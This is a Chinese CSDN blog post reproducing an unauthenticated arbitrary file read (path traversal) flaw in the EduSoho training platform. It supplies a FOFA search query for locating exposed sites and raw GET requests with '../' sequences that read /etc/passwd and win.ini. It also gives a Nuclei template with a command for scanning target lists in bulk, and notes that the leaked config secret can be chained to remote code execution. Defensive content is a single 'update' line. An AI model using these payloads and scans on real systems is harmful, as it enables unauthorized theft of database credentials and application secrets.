【漏洞复现】EduSoho教培系统 任意文件读取

最新推荐文章于 2024-05-11 06:52:50 发布
最新推荐文章于 2024-05-11 06:52:50 发布
阅读量535 收藏 6
点赞数 8
文章标签: 漏洞 漏洞挖掘 信息泄露
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/136028929
版权

该文章由掌控安全学院——1782814368投稿

【产品介绍】

EduSoho企培系统,基于EduSoho教育云PaaS平台的底层技术打造,专门为快速发展的企业提供一体化企业培训、企业内训组织解决方案,专注人才培养、专注组织建设,帮助企业构建学习型组织,促成终身学习、实现快速发展。

【漏洞介绍】

该教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞,通过该漏洞攻击者可以读取到config/parameters.yml文件的内容,拿到该文件中保存的secret值以及数据库账号密码等敏感信息。拿到secret值后,攻击者可以结合symfony框架_fragment路由实现RCE

【资产测绘Query】

fofa语法:

 

  1. title="Powered By EduSoho" || body="Powered by <a href=\"http://www.edusoho.com/\" target=\"_blank\">EduSoho" || (body="Powered By EduSoho" && body="var app")
 

 

 

【产品界面】
 

 

 

【漏洞复现】
 

【poc】
 

linux系统:
 

 

  1. GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1
  2. Host: 127.0.0.1
 

 

 


 windows系统:
 

 

  1. GET /export/classroom-course-statistics?fileNames[]=../../../../../../../Windows/win.ini HTTP/1.1
  2. Host: 127.0.0.1
 

 

 

【Nuclei-Poc】
 

 

  1. id: EduSoho_arbitrary_file_read_crossplatform
  3. info:
  4. name: EduSoho Cross-Platform Directory Traversal Vulnerability
  5. author: yourname
  6. severity: critical
  7. description:
  8. tags: directory-traversal,cve,critical
  10. requests:
  11. - method: GET
  12. path:
  13. - "{{BaseURL}}/export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"
  14. - "{{BaseURL}}/export/classroom-course-statistics?fileNames[]=../../../../../../../Windows/win.ini"
  16. matchers-condition: and
  17. matchers:
  18. - type: word
  19. part: body
  20. words:
  21. - "root:x:0:0:root:/root:/bin/bash" # Unix-like systems
  22. - "[extensions]" # Windows systems
  23. condition: or
  25. - type: status
  26. status:
  27. - 200
  29. - type: word
  30. part: body
  31. negative: true
  32. words:
  33. - "empty file"
  34. condition: and
  36. - type: word
  37. part: body
  38. negative: true
  39. words:
  40. - "\"success\": 0"
  41. condition: and
 

【验证】
 

.\nuclei -l 1.txt -t 4.yaml
 

 

 

【修复建议】
 

1:更新到最新版本
 

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
 

免费领取安全学习资料包!
 

渗透工具
 

 

技术文档、书籍
 

 
 

 

面试题
 

帮助你在面试中脱颖而出
 

 

视频
 

基础到进阶
 

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
 

 
 

 

应急响应笔记
 

 

学习路线
 

 


                

        

        

        

    




    

      

        

            

              
                
                  zkzq
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    8
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    6
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
EduSoho教培系统 任意文件读取漏洞复现(CNVD-2023-03903)

				
			

			

				

					0xSec
				

				

					12-15
					
					1140
					
				

			

		

		

			
				
教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞,通过该漏洞攻击者可以读取到config/parameters.yml文件的内容,拿到该文件中保存的secret值以及数据库账号密码等敏感信息。拿到secret值后,攻击者可以结合symfony框架_fragment路由实现RCE

			
		

	



                

              
                



	

		

			

				
					
漏洞复现EduSoho-statistics-文件读取

				
			

			

				

					知黑而守白
				

				

					01-15
					
					101
					
				

			

		

		

			
				
Edusoho 网络课堂是面向个人、学校、培训机构及企业用户的友好、开源、高性价比的在线教育建站系统Edusoho 提供在线教学、网校管理、云视频点播、直播、移 APP 等功能,为使教育机构能够以最低成本开展在线教学活动,EduSoho 也提供云服务器,云视频、云直播和移动 APP 定制服务,并配备相应的技术支持服务,让客户搭建自有品牌网校和搭积木一样简单。

			
		

	



                


  
              

                


	

		

			

				
					
教培系统EduSoho任意文件读取漏洞

				
			

			

				

					Arched的博客
				

				

					02-01
					
					621
					
				

			

		

		

			
				
教培系统EduSoho任意文件读取漏洞

			
		

	





	

		

			

				
					
2024年最全教培系统EduSoho任意文件读取漏洞_edusoho历史漏洞(1),2024年最新面试总结+详细解答

					
最新发布

				
			

			

				

					2401_84545669的博客
				

				

					05-11
					
					299
					
				

			

		

		

			
				
Edusoho是面向个人、学校、培训机构及企业用户的友好、开源、高性价比的在线教育建站系统。该系统存在配置文件读取漏洞,攻击者可以通过构造恶意代码,未授权直接下载或读取parameters.yml配置文件内容,里面包含了数据库账号密码以及secret值等敏感信息

			
		

	



		

			
		



	

		

			

				
					
漏洞复现-EduSoho任意文件读取漏洞(附漏洞检测脚本)

				
			

			

				

					jjjj1029056414的博客
				

				

					01-27
					
					871
					
				

			

		

		

			
				
漏洞复现-EduSoho任意文件读取漏洞

			
		

	





	

		

			

				
					
复现Edusoho cms任意文件读取漏洞_58

				
			

			

				

					fushuang333的博客
				

				

					02-25
					
					589
					
				

			

		

		

			
				
复现Edusoho cms任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统读取或写入任意内容。

			
		

	





	

		

			

				
					
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)

				
			

			

				

					12-25
				

			

		

		

			
				
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案

			
		

	





	

		

			

				
					
蓝海卓越计费管理系统任意文件读取批量检测脚本

				
			

			

				

					06-16
				

			

		

		

			
				
-u 指定单个url -l 指定url文件 先用fofa搜索所有涉及蓝海系统的url,然后直接跑这个脚本就可以

			
		

	





	

		

			

				
					
nc57-任意文件读取漏洞补丁

				
			

			

				

					06-08
				

			

		

		

			
				
【标题】"nc57-任意文件读取漏洞补丁" 涉及的是一个针对NC57软件的安全问题,该补丁旨在修复一个可能导致任意文件读取漏洞。在网络安全领域,这样的漏洞通常是非常严重的问题,因为它允许攻击者未经授权访问系统上...

			
		

	





	

		

			

				
					
Adminer≤4.6.2任意文件读取漏洞1

				
			

			

				

					08-03
				

			

		

		

			
				
【Adminer≤4.6.2任意文件读取漏洞详解】  Adminer是一款功能强大的Web数据库管理工具,它支持多种主流数据库系统,如MSSQL、MySQL、Oracle、SQLite和PostgreSQL,与phpMyAdmin类似。由于其轻量级的特性,只需一个...

			
		

	





	

		

			

				
					
jQuery-1.7.2任意文件读取漏洞验证利用脚本

				
			

			

				

					04-27
				

			

		

		

			
				
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件

			
		

	





	

		

			

				
					
ngnix 漏洞修复文档

				
			

			

				

					03-03
				

			

		

		

			
				
ngnix 漏洞修复文档

			
		

	





	

		

			

				
					
神仙级黑客入门教程(非常详细),从零基础入门到精通,从看这篇开始

				
			

			

				

					z099164的博客
				

				

					02-25
					
					1935
					
				

			

		

		

			
				
黑客怎么入门?这还不简单吗?

			
		

	





	

		

			

				
					
漏洞复现EduSoho教培系统 任意文件读取漏洞复现

				
			

			

				

					KKleeeaa的博客
				

				

					02-01
					
					518
					
				

			

		

		

			
				
任意文件读取

			
		

	





	

		

			

				
					
EDUSOHO踩坑笔记之二十二:数据库变更脚本(Migration)

				
			

			

				

					jyl_sh的专栏
				

				

					06-08
					
					1159
					
				

			

		

		

			
				
EDUSOHO踩坑笔记之二十二:数据库变更脚本(Migration)

 Biz Framework 使用phpmig作为数据库变更脚本的引擎,并约定项目根目录下的migrations目录为默认的 migration 脚本所在目录。

基本使用

查看所有命令:


php bin/phpmig


生成一个Migration脚本类:


bin/phpmig generate YourClassName


参数YourClassName为本次 Migration 脚本类的类名,请根据实际...

			
		

	





	

		

			

				
					
记一次edusoho问题

				
			

			

				

					weixin_30505485的博客
				

				

					06-22
					
					576
					
				

			

		

		

			
				
问题描述:Edusoho如何迁移到本地windows或另外一台Linux服务器上
解决问题步骤:
1.参考官方文档官方文档地址如下:http://www.qiqiuyu.com/my/course/331
试验过官方文档的方案,发现并不能直接解决我的问题
2.通过提问(像github对应的项目提issue)’
这个地址关于我对问题的描述和最终解决问题:https://github.com...

			
		

	





	

		

			

				
					
EDUSOHO踩坑笔记之四十九:安全

				
			

			

				

					jyl_sh的专栏
				

				

					06-10
					
					1107
					
				

			

		

		

			
				
安全

◆ R1:禁止未过滤的变量拼接 SQL,请使用变量绑定替代。ORDER BY的字段、以及分页参数$start、$limit也需要过滤。防止 SQL 注入攻击。

注意

SQL 注入会导致数据库被拖库、数据被破坏、信息泄露等严重的安全问题,属于 Web 开发安全中,破坏性最大的安全问题。

继承自GeneralDaoImpl的 Dao,可以通过sql($sql, $orderBys=null, $start=null, $limit=null)来组装 OrderBy 以及分页参数。例:
...

			
		

	





	

		

			

				
					
漏洞复现】CNVD-2023-08743

				
			

			

				

					zkaqlaoniao的博客
				

				

					10-30
					
					194
					
				

			

		

		

			
				
title=”人力资源信息管理系统

			
		

	





	

		

			

				
					
致远oa wpsassistservlet 任意文件读取漏洞

				
			

			

				

					12-27
				

			

		

		

			
				
致远oa wpsassistservlet 任意文件读取漏洞是一种安全漏洞,攻击者可以利用该漏洞读取系统中的任意文件,包括重要的系统文件及用户数据文件。攻击者可以通过该漏洞来获取敏感信息,危害系统安全。  这个漏洞存在的...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值